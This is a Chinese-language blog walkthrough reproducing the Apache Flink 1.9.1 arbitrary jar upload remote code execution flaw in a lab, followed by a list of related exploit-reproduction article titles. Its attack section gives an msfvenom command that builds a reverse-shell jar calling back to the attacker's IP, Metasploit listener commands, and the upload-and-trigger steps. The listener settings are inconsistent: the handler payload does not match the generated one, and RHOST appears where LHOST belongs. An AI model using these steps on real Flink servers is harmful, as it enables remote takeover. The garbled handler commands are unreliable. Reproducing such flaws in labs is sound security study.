Apache Flink 任意 Jar 包上传致 RCE 漏洞复现
0x00简介
Apache Flink是近几年大火的数据处理引擎。受到各大厂商的推崇并且已经应用与实际的业务场景中。很多公司在进行选型的时候都会选择Apache Flink作为选型的对象。
Apache Flink能用来做什么?
l 实时推荐系统
l 实时报表
l 实时数仓与ETL
l 复杂事件处理
l 实时欺诈与实时信用评估
l 大数据安全监测
Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。
0x01漏洞介绍
***者可直接在Apache Flink Dashboard页面中上传任意jar包,从而达到远程代码执行的目的
0x02影响范围
至目前Apache Flink 1.9.1版本
0x03环境搭建
***机kali:192.168.10.147
受害机Ubuntu:192.168.10.176
测试环境:Flink 1.9.1 java8+
Apache Flink 1.9.1安装包下载:
下载完成后使用解压
tar zxvf flink-1.9.1-bin-scala_2.11.tgz
进入bin目录运行./start-cluster.sh启动环境
环境搭建成功 目标站点
0x04漏洞复现
1、使用kali生成jar后门包
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.10.147 LPORT=2020 -f jar > shell.jar
2、***机访问目标站点 并上传shell.jar
3、使用kali配置监听
use exploit/multi/handler
set payload java/shell/reverse_tcp
set RHOST 192.168.10.147
set LPORT 2020
run
4、点开刚刚上传的shell.jar,触发漏洞
0x05修复方式
更新官方补丁或更新最新版本
- 「漏洞预警」Apache Flink 任意 Jar 包上传导致远程代码执行漏洞复现
- Apache Flink 任意 Jar 包上传导致远程代码执行漏洞复现问题(漏洞预警)
- 【学习笔记】Apache Flink任意Jar包上传导致RCE
- CVE-2020-1938:Apache Tomcat-AJP任意文件读取漏洞复现
- Weblogic任意文件上传漏洞(CVE-2018-2894)复现
- 当黑客就入门 ZzCMS8.1前台任意脚本上传漏洞复现
- 当黑客就入门 ZenTaoPMS.6.2.stable任意文件上传漏洞复现
- WebLogic 任意文件上传远程代码执行_CVE-2018-2894漏洞复现
- WebLogic 任意文件上传远程代码执行_CVE-2018-2894漏洞复现
- ewebeditor for php任意文件上传漏洞
- PHP任意文件上传漏洞
- Think CMF X任意内容包含漏洞分析复现
- 利用最新Apache解析漏洞(CVE-2017-15715)绕过上传黑名单
- Tomcat任意文件上传漏洞CVE-2017-12615复现测试
- 如何修复网站漏洞 Kindeditor任意上传文件修补
- WordPress 多个CMSMasters主题'upload.php'任意文件上传漏洞
- Discuz!X 3.4 前台任意文件删除漏洞复现
- WEB安全系列之如何挖掘任意文件上传漏洞
- WordPress Checkout插件跨站脚本漏洞和任意文件上传漏洞
- Apache开启SSI,文件上传Getshell复现